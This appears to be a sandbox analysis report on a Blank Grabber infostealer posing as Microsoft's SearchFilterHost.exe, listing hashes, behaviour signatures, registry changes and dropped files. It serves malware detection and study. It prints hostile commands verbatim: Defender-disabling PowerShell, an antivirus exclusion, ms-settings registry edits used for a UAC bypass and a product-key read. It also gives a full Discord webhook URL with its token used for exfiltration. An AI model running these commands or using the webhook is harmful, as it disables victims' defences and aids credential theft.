File name:

SearchFilterHost.exe

Full analysis: https://app.any.run/tasks/6ceeafc3-2b17-4724-b306-1f9d6059b885
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: August 01, 2025, 02:20:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
blankgrabber
uac
evasion
python
auto-startup
stealer
screenshot
pyinstaller
generic
ims-api
susp-powershell
upx
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

53E1C551E573BBC583908AC0E69834BF

SHA1:

431E0FB89FB0CABF7BE2F8C7329E539BC2E0CE78

SHA256:

06654E350A827053ADE6C860D410A135E65AFF6EC9D61242CD093CCB668DBCA9

SSDEEP:

98304:PJ3UbrMI09zWyKECE67wsLcrxYsRcVyM3eA4nYZgmIa/Yu6q6lnJrZY+2KbkIo4v:0rXWca2Ar

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • BlankGrabber has been detected

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7964)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 7016)
      • reg.exe (PID: 8056)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 2192)
      • ComputerDefaults.exe (PID: 7696)
    • Adds path to the Windows Defender exclusion list

      • SearchFilterHost.exe (PID: 6524)
      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 3872)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 1352)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 1036)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 1036)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 1036)
    • Changes Windows Defender settings

      • cmd.exe (PID: 1352)
      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 3872)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 1036)
    • Changes settings for real-time protection

      • powershell.exe (PID: 1036)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 1036)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 1036)
    • Create files in the Startup directory

      • SearchFilterHost.exe (PID: 6524)
    • Steals credentials from Web Browsers

      • SearchFilterHost.exe (PID: 6524)
    • Actions looks like stealing of personal data

      • SearchFilterHost.exe (PID: 6524)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7360)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4024)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 7692)
    • Steals Discord credentials and data (YARA)

      • SearchFilterHost.exe (PID: 6524)
    • Steals Growtopia credentials and data (YARA)

      • SearchFilterHost.exe (PID: 6524)
    • Starts CMD.EXE for self-deleting

      • SearchFilterHost.exe (PID: 6524)
  • SUSPICIOUS

    • Starts a Microsoft application from unusual location

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 4024)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
    • The process drops C-runtime libraries

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7964)
    • Executable content was dropped or overwritten

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
      • csc.exe (PID: 7700)
      • ‍  ‍ .scr (PID: 7964)
      • ‍  ‍ .scr (PID: 7720)
    • Process drops python dynamic module

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7964)
    • Application launched itself

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7964)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 3388)
      • cmd.exe (PID: 5724)
      • cmd.exe (PID: 7900)
      • cmd.exe (PID: 5724)
      • cmd.exe (PID: 7996)
    • Loads Python modules

      • SearchFilterHost.exe (PID: 4024)
    • Starts CMD.EXE for commands execution

      • SearchFilterHost.exe (PID: 4024)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7852)
    • Process drops legitimate windows executable

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7964)
    • Changes default file association

      • reg.exe (PID: 7016)
      • reg.exe (PID: 8056)
    • Found strings related to reading or modifying Windows Defender settings

      • SearchFilterHost.exe (PID: 4024)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7852)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 6256)
      • cmd.exe (PID: 2188)
      • cmd.exe (PID: 8084)
      • cmd.exe (PID: 7992)
    • Get information on the list of running processes

      • SearchFilterHost.exe (PID: 6524)
      • cmd.exe (PID: 7032)
      • cmd.exe (PID: 4708)
      • cmd.exe (PID: 828)
      • cmd.exe (PID: 6452)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1352)
      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 3872)
      • cmd.exe (PID: 2312)
      • cmd.exe (PID: 4024)
      • cmd.exe (PID: 1352)
      • cmd.exe (PID: 5184)
      • cmd.exe (PID: 3628)
      • cmd.exe (PID: 868)
    • Executes JavaScript directly as a command

      • cmd.exe (PID: 3160)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 1352)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 1352)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 3388)
      • WMIC.exe (PID: 6508)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 1944)
      • cmd.exe (PID: 6748)
      • cmd.exe (PID: 6656)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 3872)
    • Checks for external IP

      • SearchFilterHost.exe (PID: 6524)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 4880)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 3100)
      • WMIC.exe (PID: 4572)
      • WMIC.exe (PID: 8032)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 4024)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 4024)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 4024)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 2532)
    • Starts application with an unusual extension

      • cmd.exe (PID: 4552)
      • cmd.exe (PID: 7664)
      • ‍  ‍ .scr (PID: 7720)
      • ComputerDefaults.exe (PID: 7696)
      • cmd.exe (PID: 1040)
      • cmd.exe (PID: 2464)
      • ‍  ‍ .scr (PID: 7964)
      • cmd.exe (PID: 4196)
      • cmd.exe (PID: 8132)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 3100)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 7204)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 1644)
      • cmd.exe (PID: 2112)
      • cmd.exe (PID: 1068)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7700)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7360)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 7928)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • SearchFilterHost.exe (PID: 6524)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 7436)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 7936)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 3768)
    • Hides command output

      • cmd.exe (PID: 4080)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 4080)
  • INFO

    • Reads the computer name

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7720)
      • MpCmdRun.exe (PID: 7692)
      • ‍  ‍ .scr (PID: 7964)
    • The sample compiled with english language support

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7964)
    • Create files in a temporary directory

      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 4024)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7720)
      • ‍  ‍ .scr (PID: 7852)
      • MpCmdRun.exe (PID: 7692)
      • csc.exe (PID: 7700)
      • cvtres.exe (PID: 7176)
      • ‍  ‍ .scr (PID: 7964)
      • ‍  ‍ .scr (PID: 7084)
      • rar.exe (PID: 7436)
    • Checks supported languages

      • SearchFilterHost.exe (PID: 4024)
      • SearchFilterHost.exe (PID: 6688)
      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
      • tree.com (PID: 7464)
      • ‍  ‍ .scr (PID: 7852)
      • tree.com (PID: 7804)
      • MpCmdRun.exe (PID: 7692)
      • csc.exe (PID: 7700)
      • cvtres.exe (PID: 7176)
      • ‍  ‍ .scr (PID: 7964)
      • tree.com (PID: 5500)
      • tree.com (PID: 3624)
      • ‍  ‍ .scr (PID: 7084)
      • tree.com (PID: 8180)
      • tree.com (PID: 7540)
      • rar.exe (PID: 7436)
      • ‍  ‍ .scr (PID: 7720)
    • Reads the machine GUID from the registry

      • SearchFilterHost.exe (PID: 4024)
      • SearchFilterHost.exe (PID: 6524)
      • ‍  ‍ .scr (PID: 7852)
      • csc.exe (PID: 7700)
      • ‍  ‍ .scr (PID: 7084)
      • rar.exe (PID: 7436)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 2192)
      • WMIC.exe (PID: 3388)
      • WMIC.exe (PID: 4572)
      • WMIC.exe (PID: 3100)
      • WMIC.exe (PID: 7204)
      • ComputerDefaults.exe (PID: 7696)
      • WMIC.exe (PID: 3768)
      • WMIC.exe (PID: 4228)
      • WMIC.exe (PID: 6508)
      • WMIC.exe (PID: 8032)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 4080)
    • Creates files in the program directory

      • SearchFilterHost.exe (PID: 6524)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1128)
      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 7032)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 7220)
    • Checks the directory tree

      • tree.com (PID: 7464)
      • tree.com (PID: 7804)
      • tree.com (PID: 5500)
      • tree.com (PID: 8180)
      • tree.com (PID: 7540)
      • tree.com (PID: 3624)
    • Manual execution by a user

      • ‍  ‍ .scr (PID: 7720)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1128)
      • powershell.exe (PID: 7032)
      • powershell.exe (PID: 7492)
      • powershell.exe (PID: 4768)
    • Launching a file from the Startup directory

      • SearchFilterHost.exe (PID: 6524)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 7220)
    • PyInstaller has been detected (YARA)

      • SearchFilterHost.exe (PID: 2120)
      • SearchFilterHost.exe (PID: 6524)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • SearchFilterHost.exe (PID: 6524)
    • UPX packer has been detected

      • SearchFilterHost.exe (PID: 6524)
    • Checks proxy server information

      • slui.exe (PID: 4012)
    • Reads the software policy settings

      • slui.exe (PID: 4012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(6524) SearchFilterHost.exe
Discord-Webhook-Tokens (1)1309199814961139873/mg7Bd7rhIarDojHEmyE0WAKDp4Pm312qQ_Rwx9VjuJMBIm3VU8mfVcLRPZQJi1Fg6l3Y
Discord-Info-Links
1309199814961139873/mg7Bd7rhIarDojHEmyE0WAKDp4Pm312qQ_Rwx9VjuJMBIm3VU8mfVcLRPZQJi1Fg6l3Y
Get Webhook Infohttps://discord.com/api/webhooks/1309199814961139873/mg7Bd7rhIarDojHEmyE0WAKDp4Pm312qQ_Rwx9VjuJMBIm3VU8mfVcLRPZQJi1Fg6l3Y
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:11:21 17:00:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.41
CodeSize: 172032
InitializedDataSize: 157184
UninitializedDataSize: -
EntryPoint: 0xce20
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 7.0.22000.71
ProductVersionNumber: 7.0.22000.71
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Microsoft Windows Search Filter Host
FileVersion: 7.0.22000.71 (WinBuild.160101.0800)
InternalName: SearchFilterHost.exe
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: SearchFilterHost.exe
ProductName: Windows® Search
ProductVersion: 7.0.22000.71
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
295
Monitored processes
164
Malicious processes
17
Suspicious processes
6

Behavior graph

Click at the process to see the details
start #BLANKGRABBER searchfilterhost.exe searchfilterhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER searchfilterhost.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs searchfilterhost.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs mshta.exe no specs tasklist.exe no specs wmic.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs powershell.exe no specs tasklist.exe no specs powershell.exe no specs systeminfo.exe no specs tree.com no specs netsh.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs #BLANKGRABBER ‍  ‍ .scr tree.com no specs ‍  ‍ .scr no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs tiworker.exe no specs cmd.exe no specs conhost.exe no specs mpcmdrun.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs csc.exe computerdefaults.exe cvtres.exe no specs #BLANKGRABBER ‍  ‍ .scr cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs getmac.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs ‍  ‍ .scr no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
236\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
768REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
828C:\WINDOWS\system32\cmd.exe /c "tasklist /FO LIST"C:\Windows\System32\cmd.exeSearchFilterHost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
868C:\WINDOWS\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"C:\Windows\System32\cmd.exeSearchFilterHost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1036powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1040C:\WINDOWS\system32\cmd.exe /c "tree /A /F"C:\Windows\System32\cmd.exeSearchFilterHost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1068reg delete hkcu\Software\Classes\ms-settings /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
1068C:\WINDOWS\system32\cmd.exe /c "wmic path win32_VideoController get name"C:\Windows\System32\cmd.exeSearchFilterHost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1128\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1128powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop\SearchFilterHost.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
63 788
Read events
63 767
Write events
13
Delete events
8

Modification events

(PID) Process:(7016) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
(PID) Process:(2192) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(2192) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2192) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6312) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)
Value:
(PID) Process:(6312) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)
Value:
(PID) Process:(6312) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)
Value:
(PID) Process:(6312) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings
Operation:delete keyName:(default)
Value:
(PID) Process:(2192) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6524) SearchFilterHost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
Operation:writeName: 1280x720x32(BGR 0)
Value:
31,31,31,31
Executable files
246
Suspicious files
10
Text files
57
Unknown types
10

Dropped files

PID
Process
Filename
Type
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\_lzma.pydexecutable
MD5:82EBACAB21A375C90C2CC10A834D294B
SHA256:138ADC9F4A7E8CB239CDCCE05AF832B7E2527ED29DE8E3F461C9900DF8B2C404
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\_ctypes.pydexecutable
MD5:9CA880EE43FB91437D19498793311C2F
SHA256:5C885A972A841F14CCC6D81B942A5ACB60DF116E7B06AD8CB2385FC59A7FB18D
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:1E41512E769E3FE3951F7853D12C0AC2
SHA256:ACDA4A4AB53809DB541A0BF9D9748930C3B574447A93B9FC23222172EDEBE142
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\_sqlite3.pydexecutable
MD5:557A3A3A76C8BBC792901B201B0318CF
SHA256:2C0B99F214E2C6C7F2A7BB81E1EC7759039308B09CA6C4E5FFA246A6AFD2BA9E
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\_decimal.pydexecutable
MD5:BC6649C56700E2969DF45E3B590052CF
SHA256:1384008CCD60CDDCC839D3F7B0FC29BCAAC3A8AD6EDD9058488BD8CE21D695F8
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\_bz2.pydexecutable
MD5:14F6CEDE9E0019D27C31EEE3A915EF52
SHA256:B51492A7499CC557B8D3C055966A2FB5841B35FCB7BA9BA7E7D9B029A83EE44D
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\api-ms-win-core-datetime-l1-1-0.dllexecutable
MD5:4158D36E8871E903387384121C6D39E0
SHA256:4EEA5904F383CF0423D05AA6534EA17C6F4FA2224D2FC59148EE5711FC569F06
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\_hashlib.pydexecutable
MD5:BD72948920169B6F05B4F252B2D88460
SHA256:AE2964C42E590AD1D51837DD96B747619E3ED28F35172C517D7875F4381823E3
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\api-ms-win-core-debug-l1-1-0.dllexecutable
MD5:42C6148731A9226FEDFC49E1F08004DF
SHA256:23EBF4B0AF712D013EE884AB6D4AAC1F70C0BC5A0B7667221492C20C69E9C9BC
6688SearchFilterHost.exeC:\Users\admin\AppData\Local\Temp\_MEI66882\api-ms-win-core-file-l2-1-0.dllexecutable
MD5:1BB7D9ADA040376FF3A2000D04C2A07D
SHA256:E3CCEA54268B466E2FAA54C76DB86557D5832B5950D41AC952BEE7B9FB126A72
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
26
DNS requests
12
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6524
